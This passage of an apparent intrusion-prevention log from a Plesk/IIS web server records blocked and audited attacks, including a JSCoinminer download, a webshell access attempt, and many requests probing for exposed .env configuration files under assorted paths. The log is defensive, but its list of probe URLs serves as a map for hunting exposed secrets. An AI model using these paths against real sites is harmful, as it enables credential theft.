2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjo0MzU3Niwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDA3NTY2NDQwMSwidWlkIjoiM0M0NTRFRjQtMDA3RS1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000ca0e	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770076579.1777911186218261718750			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000db9	01dc94a0499ffceb	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc94a02427bb56	01dc94a02427bb56	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjgwODgsInNlc3Npb25faWQiOjAsInN0YXJ0X3RpbWUiOjE3NzAwNzY1Nzk4MDEsInVpZCI6IjNDNDU1MEY3LTAwN0UtRjFGMS1COUVDLUUwRDBGNzg0MENCQiJ9LCJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoyfSwiZGV0ZWN0aW9uX3VpZCI6IjI0MjQ3NjFELTk0QTAtMTFGMS1CODdDLTAwMTU1RDA1NzgwQyIsInBhcmVudCI6eyJjbWRfbGluZSI6IkM6XFxXSU5ET1dTXFxTeXNXT1c2NFxcaW5ldHNydlxcdzN3cC5leGUgLWFwIFwic3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcIiAtdiBcInYyLjBcIiAtbCBcIndlYmVuZ2luZTQuZGxsXCIgLWEgXFxcXC5cXHBpcGVcXGlpc2lwbWQxMGZlMzZmLWVmMGItNGNjNy05YTU3LWYwYWZiZWExYzQ1NyAtaCBcIkM6XFxpbmV0cHViXFx0ZW1wXFxhcHBwb29sc1xcc3VqY29tLmNvbShkb21haW4pKDIuMCkocG9vbClcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpLmNvbmZpZ1wiIC13IFwiXCIgLW0gMCAtdCA1IC10YSAwIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJjcmVhdGVkIjoxNjIwNDYxNzYyMTkxLCJmb2xkZXIiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXCIsIm1kNSI6IjNEMjcyNTc0RjM3OEJBMDZGRDJCODVDQjc3OUMwM0FBIiwibmFtZSI6Inczd3AuZXhlIiwicGF0aCI6ImM6XFx3aW5kb3dzXFxzeXN3b3c2NFxcaW5ldHNydlxcdzN3cC5leGUiLCJwcm9kdWN0X25hbWUiOiJJbnRlcm5ldCBJbmZvcm1hdGlvbiBTZXJ2aWNlcyIsInNoYTEiOiIxOTE3RjY5RUQyNjBFNTEzMTAxNUY5QTVENzIxMUFGNzBGMEVBNTNCIiwic2hhMiI6IkE0RTFBNUIxNDg5QjMxNjA2NEYwODNDNENEN0JGQzgzQjcwRUU0Njg0QTREOTdEMUFEMUM0RTZENjQ4MTYxQTMiLCJzaWduYXR1cmVfY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwic2lnbmF0dXJlX2NyZWF0ZWRfZGF0ZSI6MTc0ODM1ODU0MDAwMCwic2lnbmF0dXJlX2lzc3VlciI6Ik1pY3Jvc29mdCBXaW5kb3dzIFByb2R1Y3Rpb24gUENBIDIwMTEiLCJzaWduYXR1cmVfdmFsdWUiOjEwOTk1MjA3NzQxOTksInNpZ25hdHVyZV92YWx1ZV9pZHMiOlsxLDIsMyw1LDYsMTMsMTYsMTcsMTgsMjBdLCJ2ZXJzaW9uIjoiMTAuMC4yMDM0OC4xIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQzNTc2LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDc1NjY0NDAxLCJ1aWQiOiIzQzQ1NEVGNC0wMDdFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwicmVtZWRpYXRlZCI6dHJ1ZSwidGhyZWF0Ijp7ImlkIjozMTkwOCwibmFtZSI6IldlYiBBdHRhY2s6IEpTQ29pbm1pbmVyIERvd25sb2FkIDEwOCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000d03d	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770076841.5429840087890625000000			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003c1	01dc94a064342e30	000000ce	0000000f	164a8367	9febc236	00000002	00000002	00000001	01dc94a03fb4c29c	01dc94a03fb4c29c	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjNGQjRBRTA4LTk0QTAtMTFGMS1CNDBCLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000f39c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.nguyendolawyers.com.au/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc94a0ec796566	000000d3	0000000f	164a8367	b15ce05b	00000001	00000000	00000000	01dc94a0c631a938	01dc94a0c631a938	00000001	00000000	Active Response that started at 2/3/2026 6:55:14 AM is disengaged. The traffic from IP address 91.224.92.177 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b5	01dc94a0f31a8fb1	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0ce24d147	01dc94a0ce24d147	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNFMjNFNDZFLTk0QTAtMTFGMS1CMUM5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000e692	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bc	01dc94a0f31a8fb1	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0cf4a13c9	01dc94a0cf4a13c9	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNGNDZDNEE5LTk0QTAtMTFGMS1CMDQzLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000e692	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/portal/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b9	01dc94a0f66dc21e	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0cfdde622	01dc94a0cfdde622	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNGREQyMTg3LTk0QTAtMTFGMS1CMDgyLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000bada	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/api/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b9	01dc94a0f66dc21e	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0d001a9f2	01dc94a0d001a9f2	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNGRkVDMERGLTk0QTAtMTFGMS1CMDkwLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000bada	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/app/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c6	01dc94a0f66dc21e	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0d12e14fd	01dc94a0d12e14fd	00000001	00000128	[SID: 33269] Audit: Possible Misconfigured Symfony Application attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQxMkQ1MDYwLTk0QTAtMTFGMS1CMzBGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMyNjksIm5hbWUiOiJBdWRpdDogUG9zc2libGUgTWlzY29uZmlndXJlZCBTeW1mb255IEFwcGxpY2F0aW9uIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000081f5	00010000	00000002	00000002	0000bada	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Possible Misconfigured Symfony Application	http://ftp.tesonk.com/_profiler/phpinfo			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bd	01dc94a0f9c0ed83	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0d3383f53	01dc94a0d3383f53	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQzMzUxODRCLTk0QTAtMTFGMS1CM0U5LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000bada	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/awstats/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bd	01dc94a0f9c0ed83	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0d589ebc7	01dc94a0d589ebc7	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQ1ODkyNzI4LTk0QTAtMTFGMS1CMkUzLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000bada	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/.vscode/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c2	01dc94a0fd141976	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0d6b3f5a8	01dc94a0d6b3f5a8	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQ2QjBDRjgzLTk0QTAtMTFGMS1CNTVGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000bada	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/laravel/core/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b9	01dc94a10064035a	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0d95dd80d	01dc94a0d95dd80d	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkQ5NUQwMzZDLTk0QTAtMTFGMS1CNDdFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000e5e6	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/kyc/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bd	01dc94a10064035a	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0dbc8cbc0	01dc94a0dbc8cbc0	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkRCQzZFRkM4LTk0QTAtMTFGMS1CNzgxLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000bcc0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/website/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c1	01dc94a103b72eb4	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0dd679d87	01dc94a0dd679d87	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkRENjUxQTMyLTk0QTAtMTFGMS1CNjJFLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000bcc0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/development/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c6	01dc94a10a5d8792	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0e3481054	01dc94a0e3481054	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkUzNDczQkIwLTk0QTAtMTFGMS1BOEE2LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000852a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/.env.production.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003bb	01dc94a10a5d8792	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0e36e3659	01dc94a0e36e3659	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkUzNkUyNEY0LTk0QTAtMTFGMS1BOEI2LTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000852a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/.env.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003c1	01dc94a10a5d8792	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0e6326bf9	01dc94a0e6326bf9	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkU2MzIxQTkzLTk0QTAtMTFGMS1BQkRGLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000081e8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/application/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b9	01dc94a10a5d8792	000000ce	0000000f	164a8367	9f0a942d	00000002	00000002	00000001	01dc94a0e6647ad1	01dc94a0e6647ad1	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkU2NjE0NDFGLTk0QTAtMTFGMS1BQkYzLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	000081e8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://ftp.tesonk.com/web/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc94a11451292d	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc94a0ef0b091a	01dc94a0ef0b091a	00000001	00000000	Active Response that started at 2/3/2026 6:56:24 AM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
0000038a	01dc94a1d1cfb241	000000ce	0000000f	164a8367	8d84b993	00000002	00000002	00000001	01dc94a1aadee849	01dc94a1aadee849	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFBREJDMTE3LTk0QTEtMTFGMS05QzVDLTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	0000f43a	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://_dmarc.xehowo.vn/shell.asp			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b7	01dc94a23f8657a5	000000ce	0000000f	164a8367	ab0b628d	00000002	00000002	00000001	01dc94a2188e7ee0	01dc94a2188e7ee0	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjE4OEI0ODM1LTk0QTItMTFGMS1BQTVELTAwMTU1RDA1NzgwQyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000b54d	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://hpautocantho.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	